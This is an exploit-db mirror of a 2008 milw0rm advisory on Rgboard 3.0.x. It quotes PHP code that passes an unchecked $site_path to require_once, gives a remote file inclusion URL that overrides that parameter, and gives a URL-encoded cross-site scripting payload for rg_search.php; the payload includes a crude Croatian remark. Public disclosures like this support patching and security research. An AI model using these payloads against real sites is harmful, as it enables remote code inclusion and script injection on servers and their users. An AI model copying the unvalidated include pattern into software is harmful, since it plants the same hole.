exploit-db-mirror/exploits/php/webapps/5620.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

53 lines
No EOL
1.5 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

################################################
# Rgboard 3.0.x Multiple Vulnerabilities #
# (RFI/XSS) #
################################################
/**/ Author:: e.wiZz!
/**/ Site:: www.balcanwarez.com
/**/ Contact:: N/A :D
===========================================================
/**/ Script :: Rgboard
/**/ Vulnerable version :: 3.0.0/3.0.12
/**/ Not vulnerable :: 4.0
/**/ Download :: www.rgboard.com
============================================================
[<Remote File Include>]
/**/ Vulnerable code,line 22:
\include\bbs.lib.inc.php
if (!defined(’BBS_LIB_INC_INCLUDED’)) {
define(’BBS_LIB_INC_INCLUDED’, 1);
// *start of include,eh?*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path
/**/ Exploit:
http://www.target.com/include/bbs.lib.inc.php?site_path=evilthingg0ezhere
[<XSS>]
/**/ Almost every field is vulnerable to xss,example(rg_search.php):
/**/ Live demo:
http://xxx.com/rgboard/rg_search.php?bbs_id=search&page_no=2&s_text=%22%3E%3Ca+href%3D%22http%3A%2F%2Fbalcanwarez.com%22%3E%3Ch1%3EOvdje nesto bezze upises,boli me kita :D%3C%2Fh1%3E%3C%2Fa%3E
==============================================================
/**/ Thanx : QKrun1x,F34R,aluigi,Nuclear,aluigi,str0ke
/**/ PozdraF : deckima s elitesecurity.org i cyber-underground.org
===============================================================
# milw0rm.com [2008-05-14]